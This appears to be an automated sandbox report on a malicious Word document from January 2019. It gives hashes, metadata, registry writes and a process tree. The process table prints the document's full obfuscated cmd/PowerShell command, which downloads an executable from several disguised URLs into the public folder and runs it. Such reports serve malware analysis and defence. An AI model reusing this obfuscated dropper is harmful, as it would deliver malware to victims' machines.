| File name: | FA014247_3.doc |
| Full analysis: | https://app.any.run/tasks/84df9c63-1416-4b18-a323-3d00f10eb3a7 |
| Verdict: | Malicious activity |
| Analysis date: | January 17, 2019, 20:03:29 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jan 14 17:54:00 2019, Last Saved Time/Date: Mon Jan 14 17:54:00 2019, Number of Pages: 1, Number of Words: 2, Number of Characters: 14, Security: 0 |
| MD5: | 7EDF188537E4512D36575D60F64A056E |
| SHA1: | 58E9F7680F399C7E8906F98FC7CD58CA1558EA58 |
| SHA256: | 80B58A1C3693373040D28944CA207B2AE7B63DF10A9C1B8B12FD2E9BE0FC9A47 |
| SSDEEP: | 1536:iocn1kp59gxBK85fBr4ecYTDj4kciEVrA/60t4211j+a9uK:f41k/W4825ODkLVrA/7t481gK |
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
| Title: | - |
|---|---|
| Subject: | - |
| Author: | - |
| Keywords: | - |
| Comments: | - |
| Template: | Normal.dotm |
| LastModifiedBy: | - |
| RevisionNumber: | 1 |
| Software: | Microsoft Office Word |
| TotalEditTime: | - |
| CreateDate: | 2019:01:14 17:54:00 |
| ModifyDate: | 2019:01:14 17:54:00 |
| Pages: | 1 |
| Words: | 2 |
| Characters: | 14 |
| Security: | None |
| CodePage: | Windows Latin 1 (Western European) |
| Company: | - |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 15 |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | - |
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2320 | "C:\Windows\system32\cmd.exe" /c %prOgRAMdata:~0,1%%pROGRAmDaTA:~9,2% /V: /r " SEt YuP=pow^%PUBLIC:~5,1^%r^%SESSIONNAME:~-4,1^%h^%TEMP:~-2,1^%ll +virtu]lV=w3fneur]lAw3f;+Jeweler_R=new-obje.t Net$#ebClient;+`eliver]bles[=w3fhttp://r]_-bet]$.om/1bV[EjoTlj@http://m]`hur]]rts$.om/##m29mGm@http://www$7i7]journ]l$.om/D1o40Dmemk@http://li3numpolsk]$.om/lCGBPPq{MY@http://w]liw]lo$.om/urHKt1`sw3f$Split(w3f@w3f);+Br][ili]nRe]ll=w3fTriplebu77ere`Ew3f;+7ullr]n3e# = w3f9w3f;+Che.kin3A..ountB=w3fPro7it7o.use`bw3f;+ivor_m=+env:publi.6w3f\w3f6+7ullr]n3e#6w3f$exew3f;7ore].h(+plum7 in +`eliver]bles[)Ztr_Z+Jeweler_R$Downlo]`File(+plum7, +ivor_m);+solutionoriente`A=w3fAwesomePl]sti.Chipstw3f;I7 ((Get-Item +ivor_m)$len3th -3e 80000) ZInvoke-Item +ivor_m;+Bu.kin3h]mshirep=w3fGr]nite?w3f;bre]k;}}.]t.hZ}}+M]ss].husettsJ=w3fSriL]nk]Rupeekw3f;&& SET fGx=!YuP:BP=Q!&& sEt az5=!fGx:w3f='!& seT ab=!az5:{=X!& sEt jL=!ab:.=c!& sEt Mr=!jL:$=.!&SET F7e=!Mr:Z={!& seT EW9T=!F7e:_=y!& Set oP=!EW9T:+=$!&& SET 7R2=!oP:3=g!&& sEt ZM5=!7R2:[=z!&& SEt CM6R=!ZM5:]=a!&& seT zOn=!CM6R:2=3!& SeT ye=!zOn:#=W!& Set EIML=!ye:?=Z!& SeT 7WhP=!EIML:`=d!&sEt upaZ=!7WhP:6=+!&seT W1A=!upaZ:7=f!& eCHO %W1A% | c%coMMOnpRoGRaMfIlES(X86):~25,1%%wInDIr:~6,1% " | C:\Windows\system32\cmd.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 255 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2892 | CmD /V: /r " SEt YuP=pow^%PUBLIC:~5,1^%r^%SESSIONNAME:~-4,1^%h^%TEMP:~-2,1^%ll +virtu]lV=w3fneur]lAw3f;+Jeweler_R=new-obje.t Net$#ebClient;+`eliver]bles[=w3fhttp://r]_-bet]$.om/1bV[EjoTlj@http://m]`hur]]rts$.om/##m29mGm@http://www$7i7]journ]l$.om/D1o40Dmemk@http://li3numpolsk]$.om/lCGBPPq{MY@http://w]liw]lo$.om/urHKt1`sw3f$Split(w3f@w3f);+Br][ili]nRe]ll=w3fTriplebu77ere`Ew3f;+7ullr]n3e# = w3f9w3f;+Che.kin3A..ountB=w3fPro7it7o.use`bw3f;+ivor_m=+env:publi.6w3f\w3f6+7ullr]n3e#6w3f$exew3f;7ore].h(+plum7 in +`eliver]bles[)Ztr_Z+Jeweler_R$Downlo]`File(+plum7, +ivor_m);+solutionoriente`A=w3fAwesomePl]sti.Chipstw3f;I7 ((Get-Item +ivor_m)$len3th -3e 80000) ZInvoke-Item +ivor_m;+Bu.kin3h]mshirep=w3fGr]nite?w3f;bre]k;}}.]t.hZ}}+M]ss].husettsJ=w3fSriL]nk]Rupeekw3f;&& SET fGx=!YuP:BP=Q!&& sEt az5=!fGx:w3f='!& seT ab=!az5:{=X!& sEt jL=!ab:.=c!& sEt Mr=!jL:$=.!&SET F7e=!Mr:Z={!& seT EW9T=!F7e:_=y!& Set oP=!EW9T:+=$!&& SET 7R2=!oP:3=g!&& sEt ZM5=!7R2:[=z!&& SEt CM6R=!ZM5:]=a!&& seT zOn=!CM6R:2=3!& SeT ye=!zOn:#=W!& Set EIML=!ye:?=Z!& SeT 7WhP=!EIML:`=d!&sEt upaZ=!7WhP:6=+!&seT W1A=!upaZ:7=f!& eCHO %W1A% | c%coMMOnpRoGRaMfIlES(X86):~25,1%d " | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 255 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2988 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FA014247_3.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3136 | C:\Windows\system32\cmd.exe /S /D /c" eCHO %W1A% " | C:\Windows\system32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| (PID) Process: | (2988) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | ic% |
Value: 69632500AC0B0000010000000000000000000000 | |||
| (PID) Process: | (2988) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (2988) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (2988) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1311834142 | |||
| (PID) Process: | (2988) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1311834256 | |||
| (PID) Process: | (2988) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1311834257 | |||
| (PID) Process: | (2988) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: AC0B0000BEC8DAC99FAED40100000000 | |||
| (PID) Process: | (2988) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | ae% |
Value: 61652500AC0B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (2988) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | ae% |
Value: 61652500AC0B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (2988) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR93E9.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\98CF382A.wmf | — | |
MD5:— | SHA256:— | |||
| 2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\684491C8.wmf | — | |
MD5:— | SHA256:— | |||
| 2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF009623.wmf | wmf | |
MD5:— | SHA256:— | |||
| 2988 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:— | SHA256:— | |||
| 2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:— | SHA256:— | |||
| 2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4A44F8D.wmf | wmf | |
MD5:— | SHA256:— | |||
| 2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$014247_3.doc | pgc | |
MD5:— | SHA256:— | |||